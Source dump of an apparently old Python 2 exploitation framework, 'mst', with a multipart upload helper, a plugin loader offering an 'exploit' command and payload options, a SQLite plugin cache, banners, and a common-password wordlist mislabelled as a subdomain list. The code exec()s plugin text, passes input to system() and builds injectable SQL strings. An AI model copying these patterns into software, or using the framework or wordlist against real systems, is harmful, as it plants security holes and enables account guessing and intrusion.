71 |
72 | if len(v_files) == 0:
73 | data = urllib.urlencode(v_vars, doseq)
74 | else:
75 | boundary, data = self.multipart_encode(v_vars, v_files)
76 | contenttype = 'multipart/form-data; boundary=%s' % boundary
77 | if request.has_header('Content-Type') \
78 | and request.get_header('Content-Type').find('multipart/form-data') != 0:
79 | print "Replacing %s with %s" % (request.get_header('content-type'), 'multipart/form-data')
80 | request.add_unredirected_header('Content-Type', contenttype)
81 |
82 | request.add_data(data)
83 | return request
84 |
85 | def multipart_encode(vars, files, boundary = None, buffer = None):
86 | if boundary is None:
87 | boundary = mimetools.choose_boundary()
88 | if buffer is None:
89 | buffer = ''
90 | for key, value in vars:
91 | buffer += '--%s\r\n' % boundary
92 | buffer += 'Content-Disposition: form-data; name="%s"' % key
93 | buffer += '\r\n\r\n' + value + '\r\n'
94 | for key, fd in files:
95 | file_size = os.fstat(fd.fileno()).st_size
96 | filename = os.path.basename(fd.name)
97 | contenttype = mimetypes.guess_type(filename)[0] or 'application/octet-stream'
98 | buffer += '--%s\r\n' % boundary
99 | buffer += 'Content-Disposition: form-data; name="%s"; filename="%s"\r\n' % (key, filename)
100 | buffer += 'Content-Type: %s\r\n' % contenttype
101 | # buffer += 'Content-Length: %s\r\n' % file_size
102 | fd.seek(0)
103 | buffer += '\r\n' + fd.read() + '\r\n'
104 | buffer += '--%s--\r\n\r\n' % boundary
105 | return boundary, buffer
106 | multipart_encode = Callable(multipart_encode)
107 |
108 | https_request = http_request
109 |
110 | def main():
111 | import tempfile, sys
112 |
113 | validatorURL = "http://validator.w3.org/check"
114 | opener = urllib2.build_opener(MultipartPostHandler)
115 |
116 | def validateFile(url):
117 | temp = tempfile.mkstemp(suffix=".html")
118 | os.write(temp[0], opener.open(url).read())
119 | params = { "ss" : "0", # show source
120 | "doctype" : "Inline",
121 | "uploaded_file" : open(temp[1], "rb") }
122 | print opener.open(validatorURL, params).read()
123 | os.remove(temp[1])
124 |
125 | if len(sys.argv[1:]) > 0:
126 | for arg in sys.argv[1:]:
127 | validateFile(arg)
128 | else:
129 | validateFile("http://www.google.com")
130 |
131 | if __name__=="__main__":
132 | main()
133 |
--------------------------------------------------------------------------------
/mst_20131023/libs/MstPlugin.py:
--------------------------------------------------------------------------------
1 | '''
2 | Mst=>Plugin=>Class
3 | '''
4 | from MstColor import *
5 | from MstExploit import *
6 | from os import path,system
7 | class m:
8 | '''mst plugin's class'''
9 | def __init__(self,name):
10 | '''exec plugin code'''
11 | fp = open(name).read()
12 | exec(fp)
13 | code = '\n'
14 | for t in mstplugin.opts:
15 | o=t[0]
16 | v=t[1]
17 | code += 'global %s\n'%o
18 | code += '%s="%s"\n'%(o,v)
19 | code += "global plugin\n"
20 | code += "plugin=mstplugin()\n"
21 | exec(fp+code)
22 | def info(self):
23 | '''display plugin infos'''
24 | color.cprint("PLUGIN INFOS",YELLOW)
25 | color.cprint("============",GREY)
26 | color.cprint("PARAMETER VALUE",YELLOW)
27 | color.cprint("-"*15+" "+"-"*20,GREY)
28 | for n in plugin.infos:
29 | p=n[0]
30 | v=n[1]
31 | color.cprint("%-15s"%p,CYAN,0)
32 | color.cprint("%-s"%v,PURPLE)
33 | def opt(self):
34 | '''display plugin opts'''
35 | color.cprint("PLUGIN OPTS",YELLOW)
36 | color.cprint("===========",GREY)
37 | color.cprint("%-15s %-20s %-40s"%("PARAMETER","VALUE","DESCRIPTION"),YELLOW)
38 | color.cprint("%-15s %-20s %-40s"%("-"*15,"-"*20,"-"*40),GREY)
39 | for n in plugin.opts:
40 | p=n[0]
41 | v=n[1]
42 | d=n[2]
43 | color.cprint("%-15s"%p,CYAN,0)
44 | exec('color.cprint("%-20s"%'+"%s"%p+',PURPLE,0)')
45 | color.cprint("%-40s"%d,GREEN)
46 | if self.checkpayload(PAYLOAD) == "TRUE":
47 | color.cprint("PAYLOAD OPTS",YELLOW)
48 | color.cprint("============",GREY)
49 | color.cprint("%-15s %-40s"%("PARAMETER","DESCRIPTION"),YELLOW)
50 | color.cprint("%-15s %-40s"%("-"*15,"-"*40),GREY)
51 | code = open("plugins/payload/"+PAYLOAD+".py").read()
52 | exec(code)
53 | try:
54 | exec("global mstpayload")
55 | except:
56 | pass
57 | for n in mstpayload.opts:
58 | p=n[0]
59 | d=n[1]
60 | color.cprint("%-15s"%p,CYAN,0)
61 | color.cprint("%-40s"%d,PURPLE)
62 | def setp(self,p,v):
63 | '''set plugin par value'''
64 | p=p.upper()
65 | if p == 'PAYLOAD':
66 | if v.upper() == "FALSE":
67 | code = 'global PAYLOAD;PAYLOAD="false";'
68 | exec(code)
69 | color.cprint("[*] Disabled PAYLOAD !",YELLOW)
70 | elif self.checkpayload(v) == 'TRUE' and self.getopt("PAYLOAD") != "FALSE":
71 | color.cprint("[*] SET %s=>%s"%(p,v),YELLOW)
72 | code = 'global %s\n'%p
73 | code += '%s="%s"'%(p,v)
74 | exec(code)
75 | else:
76 | color.cprint("[!] SET PAYLOAD FALSE !",RED)
77 |
78 | else:
79 | color.cprint("[*] SET %s=>%s"%(p,v),YELLOW)
80 | code = 'global %s\n'%p
81 | code += '%s="%s"'%(p,v)
82 | exec(code)
83 | def getopt(self,opt):
84 | '''get plugin opt'''
85 | ok='FALSE'
86 | for n in plugin.opts:
87 | p=n[0]
88 | v=n[1]
89 | d=n[2]
90 | if opt == p:
91 | ok=v
92 | return ok.upper()
93 |
94 | def exploit(self):
95 | '''start exploit !!'''
96 | try:
97 | global fuck
98 | fuck=fuck()
99 | except:
100 | pass
101 | color.cprint("[*] Start exploit..",YELLOW)
102 | plugin.exploit()
103 | def checkpayload(self,payload):
104 | '''check payload exists'''
105 | ok='no'
106 | cf="plugins/payload/%s.py"%payload
107 | if payload == '' or payload.upper() == 'FALSE':
108 | ok='false'
109 | if path.exists(cf):
110 | ok='true'
111 | return ok.upper()
112 |
113 |
114 | def printp(self,pt,plu):
115 | '''plugin color input'''
116 | ptmp=plu.split("/")
117 | pplu=plu[len(ptmp[0])+1:]
118 | color.cprint("mst",GREY,0)
119 | color.cprint("%s["%pt,WHITE,0)
120 | color.cprint(pplu,RED,0)
121 | color.cprint("]",WHITE,0)
122 | def pluhelp(self):
123 | '''plugin help menu'''
124 | color.cprint('PLUGIN HELP MENU',YELLOW)
125 | color.cprint('================',GREY)
126 | color.cprint(' Command Description',YELLOW)
127 | color.cprint(' ------- -----------',GREY,0)
128 | color.cprint('''
129 | help Displays the plugin menu
130 | back Back to Mst Main
131 | cls Clear the screen
132 | info Displays the plugin info
133 | opts Displays the mst options
134 | set Configure the plugin parameters
135 | exploit Start plugin to exploit''',CYAN)
136 | color.cprint('PLUGIN SET HELP',YELLOW)
137 | color.cprint('===============',GREY)
138 | color.cprint(' Command Description',YELLOW)
139 | color.cprint(' ------- -----------',GREY,0)
140 | color.cprint('''
141 | PAYLOAD Set payload
142 | Set parameter''',CYAN)
143 | def cls(self):
144 | '''clear the screen'''
145 | if name == 'nt':
146 | system("cls")
147 | else:
148 | system("clear")
149 | def load(self):
150 | color.cprint("[?] USAGE::load ",YELLOW)
151 | if __name__ == '__main__':
152 | print __doc__
153 |
154 |
--------------------------------------------------------------------------------
/mst_20131023/libs/MstCache.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | '''
3 | MstCache=>class
4 | For main's some func or other~
5 | update:2013/10/21
6 | '''
7 |
8 | from MstColor import *
9 | from sqlite3 import *
10 | from os import listdir,system
11 | from random import choice
12 | from MstLoad import load
13 | from MstUpdate import nver,seru
14 |
15 | mstdb = 'cache/mst.cache'
16 | plugp = 'plugins/'
17 | p_exp = 'exploit'
18 | p_pay = 'payload'
19 | p_mul = 'multi'
20 | mstcs = 'mst'
21 |
22 | class cache:
23 | '''MstCache=>Class::cache'''
24 | def start(self):
25 | '''start cache'''
26 | color.cprint("[*] Start mst ..",GREEN)
27 | self.runsql("create table if not exists mst(id integer primary key,type text,path text)")
28 | self.runsql("delete from mst")
29 | self.inscache(self.getplus(p_exp),p_exp)
30 | self.inscache(self.getplus(p_pay),p_pay)
31 | self.inscache(self.getplus(p_mul),p_mul)
32 | self.banner()
33 |
34 | def inscache(self,c,p):
35 | '''insert data to cache'''
36 | for tmp in c:
37 | tmp=tmp[:len(tmp)-3]
38 | self.runsql('insert into mst(type,path) values("%s","%s/%s")'%(p,p,tmp))
39 |
40 | def runsql(self,sql):
41 | '''execute a sql'''
42 | conn=connect(mstdb)
43 | conn.execute(sql)
44 | conn.commit()
45 | conn.close()
46 |
47 | def getplus(self,path):
48 | '''get plugins list'''
49 | return listdir(plugp+path)
50 |
51 | def sql_all(self,sql):
52 | '''sqlite3=>cur.fetchall()'''
53 | conn=connect(mstdb)
54 | cur=conn.cursor()
55 | cur.execute(sql)
56 | tmp=cur.fetchall()
57 | cur.close()
58 | conn.close()
59 | return tmp
60 |
61 | def search(self,sear):
62 | '''search plugins'''
63 | sql='select * from mst where path like "%'+sear+'%"'
64 | result=self.sql_all(sql)
65 | msg="SEARCH '%s'"%sear
66 | color.cprint(msg,YELLOW)
67 | color.cprint("="*len(msg),GREY)
68 | self.listmst(result)
69 |
70 | def listmst(self,result):
71 | '''format print results'''
72 | color.cprint("%5s %-60s %-7s"%("ID","PATH","TYPE"),YELLOW)
73 | color.cprint("%5s %-60s %-7s"%("-"*5,"-"*60,"-"*7),GREY)
74 | for res in result:
75 | rid=res[0]
76 | rty=res[1]
77 | rpa=res[2]
78 | if len(rpa)>70:
79 | rpa=rpa[:68]+".."
80 | color.cprint("%5s %-60s %-7s"%(rid,rpa,rty),CYAN)
81 | color.cprint("="*74,GREY)
82 | color.cprint("COUNT [%s] RESULTS (*^_^*)"%len(result),GREEN)
83 |
84 | def showplus(self,p):
85 | '''show plugins'''
86 | pp=("show %s plugins"%p).upper()
87 | color.cprint(pp,YELLOW)
88 | color.cprint("="*len(pp),GREY)
89 | if p == 'all':
90 | sql='select * from mst'
91 | else:
92 | sql="select * from mst where type='%s'"%p
93 | self.listmst(self.sql_all(sql))
94 |
95 | def load(self,plugin):
96 | '''load plugins'''
97 | def getplu(pid):
98 | '''pid 2 pluName'''
99 | conn=connect(mstdb)
100 | cur=conn.cursor()
101 | cur.execute('select * from mst where id=%s'%pid)
102 | tmp=cur.fetchone()
103 | cur.close()
104 | conn.close()
105 | pat=tmp[2]
106 | pty=tmp[1]
107 | if pty == 'payload':
108 | return ''
109 | else:
110 | return pat
111 | def noload(p=0):
112 | '''no this plugin | plugin is payload'''
113 | if p == 0:
114 | color.cprint("[!] NO THIS PLUGIN !",RED)
115 | else:
116 | color.cprint("[!] IT'S A PAYLOAD !",RED)
117 | try:
118 | pid=int(plugin)
119 | if len(self.sql_all('select * from mst where id=%s'%pid))==0:
120 | noload()
121 | else:
122 | plu=getplu(pid)
123 | if len(plu)>0:
124 | pt=plu.split("/")[0]
125 | load.start(pt,plu)
126 | else:
127 | noload(1)
128 | except:
129 | if len(self.sql_all('select * from mst where path="%s"'%plugin))==0:
130 | noload()
131 | else:
132 | pt=plugin.split("/")[0]
133 | load.start(pt,plugin)
134 |
135 | def getplunums(self,p):
136 | '''get plugins nums'''
137 | if p == 'all':
138 | return len(self.sql_all('select * from mst'))
139 | else:
140 | return len(self.sql_all('select * from mst where type="%s"'%p))
141 |
142 | def mainhelp(self):
143 | '''show mainhelp'''
144 | color.cprint('MST HELP MENU',YELLOW)
145 | color.cprint('=============',GREY)
146 | color.cprint(' COMMAND DESCRIPTION',YELLOW)
147 | color.cprint(' ------- -----------',GREY,0)
148 | color.cprint('''
149 | help Displays the help menu
150 | exit Exit the MstApp
151 | cls Clear the screen
152 | show List the plugins
153 | search Search plugins
154 | use Use the plugin
155 | update Update mst|plugins''',CYAN)
156 | color.cprint('MST HELP::SHOW',YELLOW)
157 | color.cprint('==============',GREY)
158 | color.cprint(' COMMAND DESCRIPTION',YELLOW)
159 | color.cprint(' ------- -----------',GREY,0)
160 | color.cprint('''
161 | exploit List the exploit plugins
162 | payload List the payload plugins
163 | multi List the multi plugins
164 | all List all the plugins''',CYAN)
165 |
166 | def usage(self,c):
167 | '''mst=>usage'''
168 | def ius(c):
169 | '''def's def =.='''
170 | color.cprint('[?] USAGE:%s'%c,YELLOW)
171 | if c == "search":
172 | ius('search ')
173 | elif c == "show":
174 | ius('show ')
175 | elif c == "use":
176 | ius('use ')
177 | elif c == "update":
178 | ius('update ')
179 |
180 | def ban1(self):
181 | '''banner 1'''
182 | color.cprint('''
183 | ,, , r22r r::,,:iii
184 | B@B ,@@2 @B@GB@@ rB@B@B@B@B
185 | @H@s @X@s @B X@
186 | @:,@, @G Bs i@B: GB
187 | @r M@ GB @s XB@Br G@
188 | Bs B@ iB, @s sB@ MB
189 | @s BSBs @s 2Bi M@
190 | B9 ;B@ ,BH B@BMG@BG @B
191 | : , : ,r22i ,:
192 | ''',RED)
193 | def ban2(self):
194 | color.cprint('''
195 |
196 | ,i77SSXrr, ,ii
197 | 7aWMMMMMMMMMMMMMMMMMMMMMMM
198 | 7@MMMMMMMMMMMMMMMMMMMMMMMMMMMM
199 | :MMMMMMMMMMMMMMMMMMMMMMMMMMMMM@
200 | WMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
201 | ,MMMMMMMMMMMMMMMMMMMMMMMMMMMM@
202 | MMMMMMMMMMMMMMMMMMMMMMMMMMMMM
203 | ,MMMMMMMMMMMMMMMMMMMMMMMMMMM@
204 | @MMMMMMMMMMMMMMMMMMMMMMMMMMM
205 | XMMMMMMMMMMMMMMMMMMMMMMMMMM@
206 | MMMMMMMMMMMMMMMMMMMMMMMMMMM
207 | MMMMMMMMMMMMMMMMMMMMMMMMMMM
208 | BMMMMMMMMMMMMMMMMMMMMMMMMMMr
209 | SMMMMMMMMMMMMMMMMMMMMMMMMMMM
210 | iMMMMMMMMMMMMMMMMMMMMMMMMMMMX 7;
211 | MMMMM@B8Z2SXXr;;;:,.,,. . . ,;XZBMMMMMM:
212 | S7,. ..::ii;;7XXX2ZBB@MMMMMMMMMMMMMMMi
213 | .:;72aZ8B@MMMMMMMMMMMMMMMMMMMMMMMMMMBaXi.
214 | BMMMMMMMMMMMMMMMMMMMMM8a22SXrr;i,:rZZZi
215 | XMMMMMWB0Za2X;,:MMMMMWS 7WM.
216 |
217 | ''',BLUE)
218 | def ban3(self):
219 | color.cprint('''
220 | ,-,
221 | -x#######=
222 | =########XX##+
223 | .x#########XxXx#x=
224 | X###########XxxXX#=-
225 | .##########X####Xxxxx=
226 | =###XXxX+xX#X##########x=-
227 | +#XxxX#######################=.
228 | -###########X++x+--;+x###########-
229 | =#########X;. . ;-X#########.
230 | +#########+, , , . ;#########
231 | -#########- . - -. .. ;+#######,
232 | =########+, =;. -- - ..=#####+
233 | .########- .; =; ,+- . X ; ,.X##x
234 | +#######+ ; -.-. =+. .#. = , .#x
235 | ,#######---- = , ;+, .x# ,X, - ;x#
236 | .#######+--= = == ;=-,, -X#===.x=##
237 | ;+X#=-x+=;- X#+,.,+++X=-#; ,;;x+#-.-
238 | - ####x#==--+-., X-.X;=#+; =x#
239 | .; -+-##. - X##= = .,X#+ -#,
240 | = x + ,. ; x=
241 | ;-,, + -;...,. ..;-x
242 | .##= x
243 | + = -;
244 | + -+.
245 | =X+,. ,==,
246 | ''',CYAN)
247 | def ban4(self):
248 | color.cprint('''
249 | .;+it+;+tt=:
250 | .iYi;=YY .IXXXI;
251 | :IXV, iX t+iRBV,
252 | IVItY ,#; =# , Y#=
253 | .XIttIt, Mi.XV#I ,; ,. :i
254 | RttYI, . :###Y ,;..., +:
255 | YItI= .,,: . =: :::
256 | Xtt+ ... :=Y#I .i;,,:+,
257 | RtI ,=itYRM######### V I
258 | XIt ::#################; ;R, =;
259 | iYI B###BRXVYVVVVBW#X tVItiV.
260 | VIi +BBRVVVVVVYVVBI ItttB:
261 | ::,.YY; +XWMMRRRRBB; tttiVi
262 | ,+,. ,:iV= ;iIIIII:,IM##XtiYY
263 | t. ,tXBt. :IRMt=XR, tIYI
264 | ,+. +titIYt;=RW#WRt;:;;M= Vt .;::
265 | .;;=YRItittttXBX: ,::: ,;V,,..,+;
266 | ,iYVItttitt ;,= +;
267 | ,iYVItiI , : t
268 | .;Ytt; ; .,.t =:
269 | :VtI; ... ..,:IY i.
270 | ;YttII=;:::;=iIIIIt :+
271 | = ItittttIIIIIYXVYYVY=:::==
272 | :; tIttttttIYXI=, ,,,
273 | =: tYIIIIVI=
274 | ,+ .,:.i,
275 | == ;,
276 | ,;;;;:
277 | ''',PURPLE)
278 | def banner(self):
279 | '''mst banner :)'''
280 | en=self.getplunums('exploit')
281 | pn=self.getplunums('payload')
282 | mn=self.getplunums('multi')
283 | choice([self.ban1,self.ban2,self.ban3,self.ban4])()
284 | print ' =[',
285 | color.cprint('MST::My Sec Tools',GREEN)
286 | print ' -+=[',
287 | color.cprint('VER::%s::%s'%(nver,seru),CYAN)
288 | print ' + -- +=[',
289 | color.cprint('PLU::Exploits::%s Payloads::%s Multis::%s'%(en,pn,mn),YELLOW)
290 |
291 | def printmst(self):
292 | '''print mst..'''
293 | global mstcs
294 | color.cprint(mstcs,GREY,0)
295 |
296 | def execmd(self,cmd):
297 | '''run system command'''
298 | color.cprint('[*] EXEC:%s'%cmd,RED)
299 | system(cmd)
300 |
301 | def cls(self):
302 | '''clear'''
303 | if name == 'nt':
304 | system("cls")
305 | else:
306 | system("clear")
307 |
308 | def errmsg(self,msg):
309 | '''show error msg'''
310 | color.cprint("[!] Err:%s"%msg,RED)
311 |
312 | def mainexit(self):
313 | '''exit app'''
314 | color.cprint("\n[*] GoodBye :)",RED)
315 | exit(0)
316 |
317 | if __name__=='__main__':
318 | print __doc__
319 | else:
320 | cache=cache()
321 | #cache.start()
322 |
--------------------------------------------------------------------------------
/mst_20131023/dicts/sub_domain.lst:
--------------------------------------------------------------------------------
1 | a
2 | aaa
3 | aaaaaa
4 | abc
5 | abc123
6 | abcd
7 | abcd1234
8 | abcde
9 | abcdef
10 | abcdefg
11 | access
12 | action
13 | active
14 | adam
15 | adidas
16 | adrian
17 | aggies
18 | aikman
19 | airhead
20 | alaska
21 | albert
22 | alex
23 | alexande
24 | alexandr
25 | alexis
26 | alfred
27 | alice
28 | alicia
29 | aliens
30 | alison
31 | allen
32 | allison
33 | allo
34 | alpha
35 | alpine
36 | alyssa
37 | amanda
38 | amber
39 | amelie
40 | america
41 | amiga
42 | amour
43 | amy
44 | anderson
45 | andre
46 | andrea
47 | andrew
48 | andy
49 | angel
50 | angela
51 | angels
52 | angie
53 | angus
54 | animal
55 | animals
56 | anna
57 | anne
58 | annie
59 | anthony
60 | apache
61 | apollo
62 | apple
63 | apples
64 | april
65 | archie
66 | arctic
67 | ariane
68 | ariel
69 | arizona
70 | arthur
71 | artist
72 | asdf
73 | asdfg
74 | asdfgh
75 | asdfghjk
76 | asdfghjkl
77 | asdfjkl
78 | asdfjkl;
79 | aspen
80 | ass
81 | asshole
82 | asterix
83 | ath
84 | athena
85 | attila
86 | august
87 | austin
88 | author
89 | avalon
90 | avatar
91 | awesome
92 | aylmer
93 | babies
94 | baby
95 | babylon
96 | bach
97 | badboy
98 | badger
99 | bailey
100 | balls
101 | bamboo
102 | banana
103 | bananas
104 | banane
105 | bandit
106 | barbara
107 | barbie
108 | barney
109 | barry
110 | basebal
111 | baseball
112 | basf
113 | basil
114 | basket
115 | basketb
116 | basketba
117 | bastard
118 | batman
119 | beagle
120 | beaner
121 | beanie
122 | bear
123 | bears
124 | beatles
125 | beautifu
126 | beaver
127 | beavis
128 | beer
129 | belle
130 | benjamin
131 | benny
132 | benoit
133 | benson
134 | bernard
135 | bernie
136 | bertha
137 | betty
138 | bigbird
139 | bigdog
140 | bigfoot
141 | bigmac
142 | bigman
143 | bigred
144 | bilbo
145 | bill
146 | billy
147 | bingo
148 | binky
149 | biology
150 | bird
151 | birdie
152 | bitch
153 | biteme
154 | black
155 | blackie
156 | blaster
157 | blazer
158 | blizzard
159 | blonde
160 | blondie
161 | blowfish
162 | blowme
163 | blue
164 | bluebird
165 | bluesky
166 | bmw
167 | bob
168 | bobby
169 | bobcat
170 | bond
171 | boner
172 | bonjour
173 | bonnie
174 | booboo
175 | booger
176 | boogie
177 | bookit
178 | boomer
179 | booster
180 | boots
181 | bootsie
182 | boris
183 | boss
184 | boston
185 | bowling
186 | bozo
187 | bradley
188 | brandi
189 | brandon
190 | brandy
191 | brasil
192 | braves
193 | brazil
194 | brenda
195 | brewster
196 | brian
197 | bridge
198 | bridges
199 | bright
200 | broncos
201 | brooke
202 | browns
203 | bruce
204 | brutus
205 | bubba
206 | bubbles
207 | buck
208 | buddha
209 | buddy
210 | buffalo
211 | buffy
212 | bull
213 | bulldog
214 | bullet
215 | bullshit
216 | bunny
217 | business
218 | buster
219 | butch
220 | butler
221 | butthead
222 | button
223 | buttons
224 | buzz
225 | byteme
226 | cactus
227 | caesar
228 | caitlin
229 | californ
230 | calvin
231 | camaro
232 | camera
233 | campbell
234 | camping
235 | canada
236 | canced
237 | cancer
238 | candy
239 | canela
240 | cannon
241 | cannonda
242 | canon
243 | captain
244 | cardinal
245 | carl
246 | carlos
247 | carmen
248 | carol
249 | carole
250 | carolina
251 | caroline
252 | carrie
253 | cascade
254 | casey
255 | casio
256 | casper
257 | cassie
258 | castle
259 | cat
260 | catalog
261 | catfish
262 | cats
263 | cccccc
264 | cedic
265 | celica
266 | celine
267 | celtics
268 | center
269 | cesar
270 | cfi
271 | cfj
272 | cgj
273 | challeng
274 | champion
275 | champs
276 | chance
277 | chanel
278 | changeme
279 | chaos
280 | chapman
281 | charity
282 | charles
283 | charlie
284 | charlott
285 | cheese
286 | chelsea
287 | cherry
288 | cheryl
289 | chester
290 | chevy
291 | chicago
292 | chicken
293 | chico
294 | chiefs
295 | china
296 | chip
297 | chipper
298 | chiquita
299 | chloe
300 | chocolat
301 | chris
302 | chrissy
303 | christ
304 | christia
305 | christin
306 | christop
307 | christy
308 | chuck
309 | chucky
310 | church
311 | cinder
312 | cindi
313 | cindy
314 | claire
315 | clancy
316 | clark
317 | class
318 | classroo
319 | claude
320 | claudia
321 | cleaner
322 | clipper
323 | cloclo
324 | clover
325 | cobra
326 | cocacola
327 | coco
328 | coffee
329 | coke
330 | colleen
331 | college
332 | colorado
333 | coltrane
334 | columbia
335 | compaq
336 | compton
337 | compute
338 | computer
339 | concept
340 | connect
341 | connie
342 | conrad
343 | control
344 | cookie
345 | cookies
346 | cool
347 | coolman
348 | cooper
349 | copper
350 | corona
351 | corrado
352 | corwin
353 | cosmos
354 | cougar
355 | cougars
356 | country
357 | courtney
358 | cowboy
359 | cowboys
360 | coyote
361 | cracker
362 | craig
363 | crapp
364 | crawford
365 | creative
366 | cricket
367 | crow
368 | cruise
369 | crystal
370 | cuddles
371 | curtis
372 | cutie
373 | cyclone
374 | cynthia
375 | cyrano
376 | daddy
377 | daisy
378 | dakota
379 | dallas
380 | dan
381 | dance
382 | dancer
383 | daniel
384 | danielle
385 | danny
386 | darren
387 | darwin
388 | dasha
389 | database
390 | dave
391 | david
392 | dawn
393 | daytek
394 | dead
395 | deadhead
396 | dean
397 | death
398 | debbie
399 | december
400 | deedee
401 | defense
402 | deliver
403 | delta
404 | demo
405 | denali
406 | denise
407 | dennis
408 | denver
409 | depeche
410 | derek
411 | design
412 | detroit
413 | deutsch
414 | dexter
415 | diablo
416 | diamond
417 | diana
418 | diane
419 | dickhead
420 | digger
421 | digital
422 | dilbert
423 | direct
424 | director
425 | dirk
426 | disney
427 | dixie
428 | doc
429 | doctor
430 | dodger
431 | dodgers
432 | dog
433 | dogbert
434 | doggie
435 | doggy
436 | dollars
437 | dolphin
438 | dolphins
439 | dominic
440 | domino
441 | don
442 | donald
443 | donkey
444 | donna
445 | doobie
446 | doogie
447 | dookie
448 | doom
449 | dorothy
450 | doug
451 | dougie
452 | douglas
453 | dragon
454 | dream
455 | dreamer
456 | dreams
457 | drizzt
458 | drums
459 | duck
460 | duckie
461 | dude
462 | duke
463 | dundee
464 | dustin
465 | dusty
466 | dwight
467 | dylan
468 | e-mail
469 | eagle
470 | eagles
471 | easter
472 | eatme
473 | eclipse
474 | eddie
475 | edward
476 | eeyore
477 | einstein
478 | elaine
479 | electric
480 | elephant
481 | elizabet
482 | ellen
483 | elliot
484 | elsie
485 | elvis
486 | elwood
487 | email
488 | emily
489 | emmitt
490 | energy
491 | enigma
492 | enter
493 | entropy
494 | eric
495 | espanol
496 | etoile
497 | eugene
498 | europe
499 | excalibu
500 | except
501 | explorer
502 | export
503 | express
504 | faith
505 | falcon
506 | family
507 | farmer
508 | farming
509 | felix
510 | fender
511 | ferrari
512 | ferret
513 | ffffff
514 | fgh
515 | fiction
516 | fiona
517 | fire
518 | fireball
519 | firebird
520 | fireman
521 | first
522 | fish
523 | fisher
524 | fishing
525 | flamingo
526 | flash
527 | fletch
528 | fletcher
529 | flight
530 | flip
531 | flipper
532 | florida
533 | flower
534 | flowers
535 | floyd
536 | fluffy
537 | flyers
538 | foobar
539 | fool
540 | footbal
541 | football
542 | ford
543 | forest
544 | fountain
545 | fox
546 | foxtrot
547 | fozzie
548 | france
549 | francis
550 | francois
551 | frank
552 | frankie
553 | franklin
554 | fred
555 | freddy
556 | frederic
557 | freedom
558 | french
559 | friday
560 | friend
561 | friends
562 | frodo
563 | frog
564 | froggy
565 | frogs
566 | front
567 | frosty
568 | fubar
569 | fucker
570 | fuckme
571 | fuckoff
572 | fuckyou
573 | fugazi
574 | fun
575 | future
576 | gabriel
577 | gabriell
578 | gaby
579 | galaxy
580 | galileo
581 | gambit
582 | gandalf
583 | garden
584 | garfield
585 | garlic
586 | garnet
587 | garrett
588 | gary
589 | gasman
590 | gateway
591 | gator
592 | gemini
593 | general
594 | genesis
595 | genius
596 | george
597 | georgia
598 | gerald
599 | german
600 | ghost
601 | giants
602 | gibson
603 | gilles
604 | ginger
605 | gizmo
606 | glenn
607 | global
608 | go
609 | goalie
610 | goat
611 | goblue
612 | gocougs
613 | godzilla
614 | gofish
615 | goforit
616 | gold
617 | golden
618 | goldie
619 | golf
620 | golfer
621 | golfing
622 | gone
623 | goober
624 | goofy
625 | gopher
626 | gordon
627 | grace
628 | grandma
629 | grant
630 | graphic
631 | grateful
632 | gray
633 | graymail
634 | green
635 | greenday
636 | greg
637 | gregory
638 | gretchen
639 | gretzky
640 | griffey
641 | groovy
642 | grover
643 | grumpy
644 | guess
645 | guest
646 | guido
647 | guinness
648 | guitar
649 | gunner
650 | gymnast
651 | h2opolo
652 | hacker
653 | hal
654 | hammer
655 | hamster
656 | hanna
657 | hannah
658 | hansolo
659 | hanson
660 | happy
661 | happyday
662 | harley
663 | harold
664 | harrison
665 | harry
666 | harvey
667 | hatton
668 | hawaii
669 | hawk
670 | hawkeye
671 | hazel
672 | health
673 | heart
674 | hearts
675 | heather
676 | hector
677 | heidi
678 | helen
679 | hell
680 | hello
681 | help
682 | helpme
683 | hendrix
684 | henry
685 | herbert
686 | herman
687 | hermes
688 | hershey
689 | history
690 | hobbit
691 | hockey
692 | hola
693 | holly
694 | home
695 | homebrew
696 | homer
697 | honda
698 | honey
699 | hoops
700 | hootie
701 | horizon
702 | hornet
703 | hornets
704 | horse
705 | horses
706 | hotdog
707 | hotrod
708 | house
709 | houston
710 | howard
711 | hunter
712 | hunting
713 | huskers
714 | icecream
715 | iceman
716 | idiot
717 | iguana
718 | iloveyou
719 | image
720 | imagine
721 | impala
722 | indian
723 | indiana
724 | indigo
725 | info
726 | informix
727 | insane
728 | inside
729 | intel
730 | intern
731 | internet
732 | ireland
733 | irene
734 | irish
735 | ironman
736 | isaac
737 | isabelle
738 | isis
739 | island
740 | italia
741 | italy
742 | jack
743 | jackie
744 | jackson
745 | jacob
746 | jaeger
747 | jaguar
748 | jake
749 | jamaica
750 | james
751 | jan
752 | jane
753 | janice
754 | january
755 | japan
756 | jared
757 | jasmin
758 | jasmine
759 | jason
760 | jasper
761 | jazz
762 | jean
763 | jeanette
764 | jeanne
765 | jeff
766 | jeffrey
767 | jenifer
768 | jenni
769 | jennifer
770 | jenny
771 | jensen
772 | jeremy
773 | jerry
774 | jessica
775 | jessie
776 | jester
777 | jesus
778 | jewels
779 | jim
780 | jimbo
781 | jimbob
782 | jkm
783 | joanna
784 | joe
785 | joel
786 | joey
787 | john
788 | johnny
789 | johnson
790 | jojo
791 | joker
792 | jonathan
793 | jordan
794 | joseph
795 | josh
796 | joshua
797 | josie
798 | jsbach
799 | judith
800 | judy
801 | julia
802 | julian
803 | julie
804 | junebug
805 | junior
806 | jupiter
807 | justice
808 | justin
809 | karen
810 | katherin
811 | kathleen
812 | kathryn
813 | kathy
814 | katie
815 | kayla
816 | keith
817 | kelly
818 | kelsey
819 | kennedy
820 | kenneth
821 | kermit
822 | kevin
823 | khan
824 | kids
825 | killer
826 | killme
827 | kim
828 | kimberly
829 | kinder
830 | king
831 | kingdom
832 | kingfish
833 | kitten
834 | kittens
835 | kitty
836 | kleenex
837 | knicks
838 | knight
839 | knights
840 | koala
841 | koko
842 | kombat
843 | kramer
844 | kristen
845 | kristi
846 | kristin
847 | kristy
848 | krystal
849 | lacrosse
850 | laddie
851 | lady
852 | ladybug
853 | lakers
854 | lakota
855 | lamer
856 | larry
857 | larson
858 | laser
859 | laura
860 | lauren
861 | laurie
862 | law
863 | ledzep
864 | lee
865 | legend
866 | lennon
867 | leon
868 | leonard
869 | leslie
870 | lestat
871 | letmein
872 | letter
873 | library
874 | light
875 | lincoln
876 | linda
877 | lindsay
878 | lindsey
879 | lionking
880 | lisa
881 | little
882 | liverpoo
883 | lizard
884 | lloyd
885 | logan
886 | logical
887 | london
888 | looney
889 | lorraine
890 | loser
891 | louis
892 | louise
893 | love
894 | lovely
